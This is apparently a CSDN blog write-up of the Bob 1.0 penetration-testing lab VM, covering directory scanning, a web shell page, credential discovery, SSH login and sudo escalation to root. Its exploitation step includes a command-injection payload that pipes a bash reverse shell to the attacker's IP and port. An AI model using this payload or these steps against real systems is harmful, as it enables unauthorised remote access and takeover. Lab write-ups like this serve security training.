Bob1.0

最新推荐文章于 2024-08-28 09:29:32 发布
最新推荐文章于 2024-08-28 09:29:32 发布
阅读量317 收藏 1
点赞数 8
文章标签: linux 服务器 网络 安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141193441
版权

一、主机发现

二、信息收集

1.目录扫描

dirsearch -u 192.168.7.141

1)访问/robots.txt

2)访问/dev_shell.php

3)执行执行whoami | ls,发现备份文件

直接访问下载

http://192.168.7.141/dev_shell.php.bak

有过滤

三、利用

在浏览器执行反弹语句

whoami | pwd&echo "bash -i >& /dev/tcp/192.168.7.211/7788 0>&1" | bash

在攻击机开启监听

这里显示延迟就证明被监听了

kali监听成功

四、提权

1.查看文件

cd /home 
ls
cd bob
ls -al

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

查看Documents目录

cd Documents
ls

/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh

查看,藏头诗密码为 HARPOCRATES

2.ssh登录

ssh jc@192.168.111.142 -p 25468
Qwerty

3.拿到bob密码

4.到elliot

找到文件

查看,密码

5.切换bob:b0bcat_

连接成功,,输入sudo -l,全都可以执行

输入sudo su提权成功

蓝天模糊
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
微信支付开发 1.0
fenggfa的博客
08-28 419
微信支付简单了解
Bob - 猜拳
少儿编程侯老师的博客
02-15 263
# 石头1 布 2 剪刀3 """ 石头剪刀布 1.0 完成功能 石头剪刀布 2.0 显示电脑和我们出了什么 我们赢: 电脑 我们 结果 1 2 -1 2 3 -1 3 4 -1 我们输: 电脑 我们 结果 1 3 -2 2 4 -2 3 5 ...
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 952
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
Georgia and Bob
嘘...一只bug
02-29 292
#pragma GCC optimize(2) #include<bits/stdc++.h> using namespace std; typedef long long ll; #define pi acos(-1.0) #define e exp(1.0) const ll maxn=1e6+7; ll N; ll A[maxn]; int main() { //...
Http1.0协议常识
gulanga5的博客
02-20 506
Http1.0协议常识
Turbo Basic1.0
06-29
Turbo BASIC是一个BASIC编译器与编辑器,最初由Robert 'Bob' Zale所开发,后来被Borland买下。当Borland决定不再贩售之后, Zale从Borland手中买回它,并改名为PowerBASIC并创立PowerBASIC公司,,以继续支援与研发...
BOB人才招聘系统 v1.0
08-05
"BOB人才招聘系统 v1.0" 是一个专门针对人力资源管理和招聘流程设计的应用程序,提供了全面的功能以支持企业的招聘工作。此系统的核心是后台管理界面,可以通过 `/manage/login.asp` 这个URL进行访问。这表明该系统...
Bob同学录美化版 v1.0
06-05
集成了班级留言板,班级相册,留言给个人,班级名片,资料修改,班级简介等功能。有后台管理,可以方便的进行班级信息管理。首页调用班级注册人数,当月寿星,在线统计等参数。
云边开源轻博 1.0 build 1111.rar
05-23
云边开源轻博 1.0 build 1111 发布说明: 1、全新的界面华丽的外观。 2、新增主题自定义,可以自行设置安装个性主题。支持专属主题设置。 3、新增标签收藏,可以管理自己关注的标签。 4、新增私信发布功能。 5、...
虚拟内存和linux(操作系统八股文part1)
linjixia的博客
08-24 1281
八股之虚拟内存和Linux部分的笔记。
Linux 线程的控制 互斥与同步
qq_63145217的博客
08-23 1466
include //头文件sem_t sem;信号量的类型 信号量的变量。
Linux中杀死占用某个端口的进程
最新发布
靖妖傩舞
08-28 395
选项表示强制终止进程,但这种方式可能会导致数据丢失或其他不良后果,所以在使用时要谨慎。确定要杀死的进程 PID。从上述步骤中获取到占用端口 9997 的进程 PID。
Linuxctags——R的使用
m0_71703182的博客
08-23 718
按下。
Linux 进程 | 进程优先级&进程的环境变量
TTKunn的博客
08-23 1633
本文主要内容为进程的优先级和进程的环境变量,其中含有查看进程、优先级概念、环境变量概念等详细内容
linux发邮件的操作流程和注意事项有哪些?
danplus的博客
08-23 631
掌握Linux发邮件的操作流程和注意事项,可以帮助你在Linux系统中高效、安全地发送邮件。AokSend:集成API与SMTP,Linux下一键高效发邮件,稳定可靠,营销自动化首选!
Linux-部署YUM仓库及NFS共享服务
qq_42520799的博客
08-25 1008
YUM仓库服务、NFS共享存储服务等
linux上datax 安装以及使用
寂夜了无痕的博客
08-24 2750
linux上datax 安装以及使用
fork exec cow
bonfirelit的博客
08-23 935
在fork()时:COW 允许父进程和子进程共享相同的内存页面,直到有一个进程进行写操作。这减少了不必要的内存复制,提高了性能。在exec()时:COW 提供的内存共享机制可以避免在调用exec()之前进行不必要的内存复制,但在exec()调用之后,这些共享内存将被新加载的可执行文件所取代。
yii1.0如何批量向数据库插入数据
06-07
在 Yii1 中,你可以使用 `batchInsert()` 方法来批量插入数据,该方法是在 `CDbCommand` 类中定义的。 以下是一个示例代码,向 `user` 表插入多行数据: ```php $data = array( array('John', 'Doe', 'johndoe@example.com'), array('Jane', 'Doe', 'janedoe@example.com'), array('Bob', 'Smith', 'bobsmith@example.com'), ); Yii::app()->db->createCommand() ->batchInsert('user', array('first_name', 'last_name', 'email'), $data) ->execute(); ``` 在这个示例中,`$data` 数组包含了要插入的多行数据,`batchInsert()` 方法会将数据批量插入到 `user` 表中,第二个参数是要插入的列名数组。 需要注意的是,`batchInsert()` 方法一次最多只能插入 100 行数据,如果要插入更多的数据,你需要将数据分成多个数组,分批插入。 如果你想要了解更多关于 Yii1 中的数据库操作,可以参考官方文档:https://www.yiiframework.com/doc/guide/1.1/zh/database.dao
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值